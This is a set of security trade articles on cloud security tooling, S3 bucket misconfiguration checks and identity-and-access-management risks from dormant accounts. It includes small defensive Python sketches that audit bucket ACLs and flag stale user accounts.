When the cloud removes barriers to velocity, the number of machines, servers, containers, and networks explodes. As complex as on-premises data centers can be, cloud solutions are far worse: the number of cloud entities, configuration files, event logs, locations, networks, and connections are too much for even expert human analysis. Analyzing security incidents, assessing the impact of a breach, or even simply tracing an administrator’s activities isn’t possible with traditional data center security tools.

Cloud Security Needs New Solutions

Moving to the cloud is more than a simple lift-and-shift of existing servers and apps to a different set of servers. Granted, offloading infrastructure responsibilities to your provider is a huge win. Without capital expenses and the inertia of hardware, IT organizations do more with less, faster.

Fortunately, new cloud-centric security solutions make your move to the cloud easier. Three key capabilities can keep you out of trouble as you transition: automation, an expanded focus on apps and operations (in addition to networks), and behavioral baselining.

Automation makes it possible to keep up with cloud changes (and DevOps teams) during deployment, operations, and incident investigations. Moving the security focus up the stack reduces the impact of network impermanence in the cloud and delivers better visibility into high-level application and service operations. And behavioral baselining makes short work of otherwise tedious rule and policy development.

With the right technologies, and an understanding of the differences, security pros can easily make the move to the cloud.

About the author: Sanjay Kalra is co-founder and CPO at Lacework, leading the company’s product strategy, drawing on more than 20 years of success and innovation in the cloud, networking, analytics, and security industries.

Put Your S3 Buckets to the Test to Ensure Cloud Fitness
Fri, 13 Oct 2017 09:33:00 -0500

A striking aspect of many of the headline-grabbing data breaches is the relative ease with which hackers were able to get to sensitive data. We picture hackers running wildly complex algorithms and plotting sophisticated schemes, but when you encounter a data repository named "Access Keys" that doesn't require a password, it turns out your job is pretty easy.

AWS S3 buckets are getting the lion's share of the blame for many of these breaches. But like any asset, S3 buckets simply operate according to how they're configured and managed. And therein lies a problem representative of so many of the vulnerabilities cloud users face. Misconfigurations, poorly constructed access policies, lack of controls: these are just some of the issues that can open a cloud environment to bad actors, and all of this work is directed by humans, with the S3 buckets just doing what they're told. In an environment as dynamic as a typical enterprise cloud, humans aren't necessarily going to be able to keep track of every aspect of every asset. For these assets to function optimally and securely, organizations have to apply active management along with continuous scrutiny.

Within a cloud environment, many factors are at play simultaneously and continuously. IT teams have to be both proactive and reactive in order to deal effectively with vulnerabilities and attacks. To support those efforts, they have processes and tools that prevent, monitor, and remediate, all in an effort to constantly thwart risk. While the potential for incoming issues is massive, the work required to mitigate that risk can be fairly simple; but like exercise and regular check-ups, it has to be done regularly and with purpose.

We know that default settings from AWS tend to be fairly permissive; some of the problem in so many breaches relates to this permissive nature. But no customer should operate something so important to their environment without customizing it to their own needs. And no matter what their infrastructure needs are, the privacy of their data and that of their customers requires that they put their S3 buckets through fitness tests to ensure they are aware and in control of how those buckets are functioning. Enterprises that want to effectively secure S3 buckets must recognize the liability involved if these get breached. There are some key aspects to how S3 objects and buckets operate, and security teams should be familiar with AWS settings and functionality before they move forward with implementing a security plan. These include access to buckets, user rights within buckets, and versioning and logging capabilities.

Access to your stored data is the logical place to start. There are settings in AWS that determine who can view lists of your S3 buckets, and who can see and edit your Access Control Lists (ACLs). If your buckets have those settings set to give “All AWS Users” access, you are setting yourself up to be compromised. With global ACL permissions on, you allow anyone to grant wide permissions to your content; at best, you give them a detailed treasure map of which buckets may contain interesting data.

At the same time, while the breaches that make the news are all about hackers getting access to remove data, hackers putting data into your S3 buckets can be equally dangerous to your organization. If the Global PUT permission is enabled on any of your S3 buckets, anyone can place information into them. This may seem harmless, but someone with malicious intent could place content into your buckets that would be harmful or embarrassing to your business. It is best to allow only authorized users and systems to PUT to your S3 buckets. With the right permissions, a bad actor can also apply “global delete” to your repository, wiping all the data contained therein. Requiring multi-factor authentication (MFA) in order to use that capability can ensure that CloudTrail logs and other sensitive data cannot be removed by an unauthorized user.

AWS customers should also be aware that versioning of S3 objects is not enabled by default. Versioning is incredibly important: in the event of an object being overwritten or deleted, it keeps an instance of the object available to “roll back” to as a method of recovery. Additionally, with audit logging enabled on your S3 buckets, you will be able to get the details of all bucket activity. The logs are an important tool when troubleshooting issues or investigating an incident. Logging cannot be enabled retroactively, so it is important to collect your audit logs as you set up your S3 buckets if you wish to keep tabs on bucket and object activity.
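The checks described above can be sketched as a small audit function over the response shapes that boto3’s get_bucket_acl and get_bucket_versioning calls return. The sample data here is invented; in practice you would feed in live API responses rather than hard-coded dicts:

```python
# The AWS-defined URI that marks a grant as public ("All Users").
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"

def audit_bucket(acl, versioning):
    """Flag public ACL grants and missing versioning/MFA-delete protections.
    acl / versioning follow boto3's get_bucket_acl / get_bucket_versioning shapes."""
    findings = []
    for grant in acl.get("Grants", []):
        if grant.get("Grantee", {}).get("URI") == ALL_USERS:
            findings.append(f"public grant: {grant['Permission']}")
    if versioning.get("Status") != "Enabled":
        findings.append("versioning disabled: no roll-back after overwrite/delete")
    if versioning.get("MFADelete") != "Enabled":
        findings.append("MFA delete disabled: versions can be purged without MFA")
    return findings

# Invented example: a bucket that is world-writable and unversioned.
acl = {"Grants": [{"Grantee": {"Type": "Group", "URI": ALL_USERS},
                   "Permission": "WRITE"}]}
findings = audit_bucket(acl, {"Status": "Suspended"})
```

Running a check like this on a schedule is one way to turn the one-time “fitness test” into the continuous monitoring the next paragraph calls for.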

Advice must be followed by action in order to become, and remain, fit in the cloud. While these measures are critical to attain the basic level of security for your S3 buckets, they are always going to be a target because they store sensitive data. So, continuous awareness through automated monitoring will provide the necessary control needed to identify and fix vulnerabilities, and provide the right layer of control to maintain safe and effective business operations.

Is Your “Father’s IAM” Putting You at Risk?
Fri, 13 Oct 2017 07:29:00 -0500

Identity and access management (IAM) is all about ensuring that the right people have the right access to the right resources – and that you can prove that all that access is right. But as any of us who are heavily involved in IAM know, that is much easier said than done. There’s a lot that goes into getting all those things “right.”

First, you must set up the accounts that enable a user to get to the right stuff – that is often called provisioning (and its dangerous sister, de-provisioning). Second, in order for that account to grant the appropriate access, there has to be a concept of authorization that defines what is and is not allowed with that access. And third, there should be some way to make sure that provisioning and de-provisioning are done securely (and ideally efficiently), and that the associated authorization is accurate – i.e., everyone has exactly the access they need, nothing more and nothing less.

Everyone has been provisioning and de-provisioning since we first started networking PCs, and as soon as larger numbers of users began sharing those computers, the need for some concept of authorization followed. The problem is that the practices that worked so well in those relatively closed networks with relatively few users simply don’t cut it in today’s open (close to boundary-less), fluid, modern networks. The result is loads of inefficiency, elevated risk, and the potential for catastrophic breaches.

In recent research sponsored by One Identity, the dangers of old-fashioned practices for provisioning, de-provisioning and authorization were laid bare. Stated plainly, the practices and technologies that served you so well in the past are simply inadequate in today’s digitally transformed world.

Here are some of the key findings gleaned from responses from more than 900 IT-security professionals worldwide, with a little exposition on each:

  • 87% reported that they have dormant accounts and 71% were concerned about them – that means that more than three-quarters of those interviewed have not de-provisioned accounts that are no longer needed, either because the user is no longer with the organization or has switched roles and most of those are worried about it.
  • Only 1/3 expressed that they were “very confident” that they even know which dormant user accounts exist. So not only do they have dangerous entry points into their networks, most couldn’t even tell you which accounts they are.
  • 97% have a process for identifying dormant accounts, but only 19% have tools to help find them. In addition, 92% report that they regularly check for dormant accounts. This is where there is a disconnect: if the majority have dormant accounts and most have a process to find them, the process obviously isn’t working. In spite of best efforts (or, as I would say, old-fashioned de-provisioning practices), the risk is still there.

The risk is not the fact that there are dormant accounts; the risk is what can be done with those hidden doors into your systems and data. Most high-profile breaches are the result of a bad actor compromising a legitimate user account. That could be gaining access through phishing or social engineering, or hunting for and finding a dormant account that the organization doesn’t even know exists. Once in, a series of lateral moves and rights-escalation activities can result in access to the very systems and data you are trying to protect.

So here’s where the second set of data becomes remarkably intriguing. We asked the same 900+ IT security professionals a series of questions about the rights and permissions that their users possess, and here were the big reveals:

  • Only one in four expressed that they were “very confident” that user rights and permissions are correct. That means that ¾ of our respondents were unsure of the fundamental aspect of access control – authorization. Any user with excessive rights (rights that are more than necessary to do the job) is an easy path for bad actors to execute those lateral moves they are so good at.
  • Less than 1/3 are “very confident” that users are de-provisioned properly. By properly we mean fully and immediately (only 14% of respondents reported that users were de-provisioned immediately upon a change in status). De-provisioning is the process of turning off accounts and revoking rights when they are no longer needed. Poor de-provisioning, either through outdated and cumbersome manual processes or limited tools, is the primary cause of dormant accounts.
  • In fact, 95% reported that while they have a process for de-provisioning, it requires IT intervention. In other words, someone has to put hands on a keyboard to make it happen. Any amount of time that an unneeded account remains “open” is an invitation for disaster as evidenced by so many of the high-visibility breaches over the past several years.

So what can be done? There are many ways to modernize these processes and get IAM right. Here’s a few suggestions:

  1. Determine a single source of the truth for authorization. Define business roles once and use them everywhere. And most importantly, let the line-of-business be the decision makers here. Many instances of inappropriate rights are simply the byproduct of IT doing the best they can with the knowledge they’ve been given. It’s all too common for the line-of-business to ask IT to “give Joe the same rights as Bill” when there was no oversight into what rights Bill has, how he got them, and whether they are still appropriate for the job he does.
  2. De-provision immediately and completely. Tools exist that can update permissions the instant a status change occurs in an authoritative data source. For example, as soon as an employee’s status in the HR system switches from active to inactive, that user’s access rights across every system in the enterprise (including cloud-based services) can be terminated immediately – effectively closing all those doors and eliminating dormant accounts.
  3. Implement identity analytics. A new class of IAM solution called identity analytics will proactively and constantly evaluate your systems to find instances where user rights are out of alignment with what is “right.” These technologies quickly find dormant accounts, mis-provisioned accounts, and instances of rights elevation that are often the smoking gun in breach detection and prevention.
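As a toy sketch of what identity analytics does under the hood, the following cross-references account activity against an authoritative HR status to surface dormant and orphaned accounts. The 90-day threshold, field names, and sample data are illustrative assumptions, not any product’s behavior:

```python
from datetime import datetime, timedelta

DORMANT_AFTER = timedelta(days=90)  # assumed review threshold

def find_risky_accounts(accounts, hr_status, now):
    """accounts: {username: last_login datetime}.
    hr_status: {username: 'active' | 'inactive'} from the authoritative source.
    Returns {username: finding} for accounts needing action."""
    risky = {}
    for user, last_login in accounts.items():
        if hr_status.get(user) != "active":
            risky[user] = "orphaned: owner no longer active, de-provision immediately"
        elif now - last_login > DORMANT_AFTER:
            risky[user] = "dormant: no login in 90+ days, review access"
    return risky

# Invented sample data: bob hasn't logged in for months; carol has left.
now = datetime(2017, 10, 13)
accounts = {"alice": datetime(2017, 10, 1),
            "bob": datetime(2017, 3, 2),
            "carol": datetime(2017, 10, 5)}
hr = {"alice": "active", "bob": "active", "carol": "inactive"}
risky = find_risky_accounts(accounts, hr, now)
```

The value of running this continuously rather than as a periodic manual audit is exactly the survey’s point: a process that depends on hands-on-keyboard checks is the reason 87% still have dormant accounts.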

Just as the technology we rely on every day is evolving and its boundaries are expanding, the identity and access management practices we use to secure access to those systems must evolve as well. As our survey reaffirmed, what worked well a few years ago is almost certainly inadequate given today’s realities. But there is hope: with simple shifts in responsibility, IAM practices, and IAM technologies, you can significantly reduce risk, modernize your business, and sleep better at night.

About the author: Jackson Shaw is senior director of product management at One Identity, an identity and access management company formerly under Dell. Jackson has been leading security, directory and identity initiatives for 25 years.
